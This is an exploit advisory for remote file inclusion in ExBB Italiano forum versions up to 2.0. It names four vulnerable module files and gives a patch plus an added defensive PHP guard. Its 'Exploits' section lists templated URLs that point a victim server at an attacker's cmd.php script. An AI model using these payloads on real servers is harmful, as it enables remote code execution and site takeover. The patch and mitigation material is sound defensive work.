#
# ExBB Italiano <= 2.0 exbb[home_path] Multiple Remote File Inclusion Exploit
#
#
# General Info:
#
# - Critical Level: Dangerous
# - Version affected: <= 2.0
# - Vendors: exbb.clans.it
#
# Bugged files:
#
# - modules/threadstop/threadstop.php
# - modules/userstop/userstop.php (*)
# - modules/birstday/birst.php
# - modules/newusergreatings/pm_newreg.php
#
# Universal patch, to be placed right after the opening PHP tag of every affected file
#
# if ((stristr($_SERVER['QUERY_STRING'], 'exbb[home_path]'))
# or (stristr($_SERVER['QUERY_STRING'], "exbb['home_path']"))) {
#     die("Patched! Thanks to Flippo.");
# }
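#
# A stricter variant of the guard above, added here as an example (not part of
# the original advisory and not ExBB code): it checks PHP's parsed GET, POST and
# cookie parameters, so it does not depend on how the name is written in the raw
# query string. The function name and the register_globals-style import are
# assumptions; the [] syntax needs PHP 5.4 or later.
#

```php
<?php
// Added example, not ExBB code. Assumption: the affected modules build an
// include path from $exbb['home_path'] / $new_exbb['home_path'], and those
// variables can be set from the request (register_globals-style import).

/**
 * Return "SOURCE:name" for every request source that tries to supply one of
 * the protected variable names. Works on PHP's parsed parameter arrays.
 */
function exbb_request_overrides(array $sources, array $names = ['exbb', 'new_exbb'])
{
    $hits = [];
    foreach ($sources as $label => $params) {
        foreach ($names as $name) {
            if (array_key_exists($name, $params)) {
                $hits[] = $label . ':' . $name;
            }
        }
    }
    return $hits;
}

// Guard: place directly after the opening tag of each listed module file.
$hits = exbb_request_overrides(['GET' => $_GET, 'POST' => $_POST, 'COOKIE' => $_COOKIE]);
if ($hits !== []) {
    error_log('ExBB guard: request tried to set ' . implode(', ', $hits));
    header('HTTP/1.1 403 Forbidden');
    exit('Forbidden');
}

// Self-check on constructed query strings (runs from the CLI only).
if (PHP_SAPI === 'cli') {
    foreach (['new_exbb[home_path]=x', 'exbb[home_path]=x', 'topic=5'] as $qs) {
        parse_str($qs, $parsed);
        $found = exbb_request_overrides(['GET' => $parsed]);
        echo $qs, ' => ', $found ? implode(', ', $found) : 'allowed', "\n";
    }
}
```

# On PHP versions that have these settings, register_globals = Off and
# allow_url_include = Off in php.ini remove the preconditions for this class of bug.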
#
#
# Exploits
#
# - http://{localhost}/{forum}/modules/threadstop/threadstop.php?new_exbb[home_path]={php_cmd_path}
# - http://{localhost}/{forum}/modules/userstop/userstop.php?exbb[home_path]={php_cmd_path} (*)
# - http://{localhost}/{forum}/modules/newusergreatings/pm_newreg.php?exbb[home_path]={php_cmd_path}
# - http://{localhost}/{forum}/modules/birstday/birst.php?exbb[home_path]={php_cmd_path}
#
# - {localhost} : your victim
# - {forum} : path of ExBB's installation
# - {php_cmd_path} : your cmd.php :P
#
#
# Discovered by Flippo - lord.flippo[at]gmail[dot]com
#
#
# Greetings to:
#
# * all the ExBB Italiano Community, particularly SamyWeb
# * #baslug, particularly zeno
# * #hacker.it
# * #sockets, particularly hz
# * and all the others
#
#
# (*) This bug (and so the exploit too) was already found by SHiKaA - SHiKaA-[at]hotmail[dot]com
#